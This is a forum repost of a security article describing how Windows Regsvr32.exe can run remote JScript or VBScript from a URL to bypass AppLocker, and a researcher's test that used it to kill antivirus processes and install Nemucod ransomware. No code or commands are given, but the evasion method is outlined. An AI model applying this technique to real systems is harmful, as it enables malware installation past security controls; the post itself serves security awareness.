Jump to content

Regsvr32 can be used to install Ransomware through Jscript Installers


Petrovic

Recommended Posts

A security researcher named Casey Smith published an article last week where he detailed how the Windows Regsvr32.exe command could be used to bypass AppLocker restrictions. In this article he described a not commonly known feature where Regsvr32 can execute specially crafted scripts on a remote host using a URL. These scripts are XML files that contain embedded Jscript or VBScript scripts that will be executed when Regsvr32 runs the script.  

 

This obviously leads to a whole mess of possibilities where an attacker can do very bad things to your computer as long as they have access to it. Unfortunately, there are many ways for an attacker to gain access to a computer, whether it be through an exploit kit or a vulnerability.

 

Regsvr32.exe installing Ransomware through JScript
As a test, I decided to take a ransomware javascript installer and modify it so that it can work with Regsvr32.exe. As the Nemucod ransomware relies heavily on Javascript to install itself, I thought that this ransomware would be a good one to test with.

 

Using the instructions found in Casey Smith's article, I created a specially crafted XML file that contained the Javascript from the Nemucod installer.  I had to modify it a bit to get it to work properly with Regsvr32.exe, but that was easy enough to do.  I then modified it further by adding a small script that creates a batch file in the %Temp% folder that is executed by the script before installing the ransomware. This batch file will terminate known anti-malware and anti-virus programs so that they are unable to block the ransomware from being installed.

 

Unfortunately, the test worked perfectly. Regsvr32.exe was able to execute my script using a URL to my test server. This script then terminated my running anti-virus software and installed the ransomware. In order to demonstrate this test, I created the video below that shows how I used Regsvr32.exe to install the Nemucod ransomware.

 

What makes this method worse, is that this can be used to easily modify the system before installing a malware.  Using normally white listed programs, a VBScript or JScript script can easily make registry or system configuration changes, terminate security processes, and then install whatever malware they want. Furthermore, since Regsvr32.exe is a legitimate application and these remote script files can be named whatever you want, anti-virus software will not easily detect it.

 

Full Article

Link to comment
Share on other sites


  • Views 564
  • Created
  • Last Reply

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...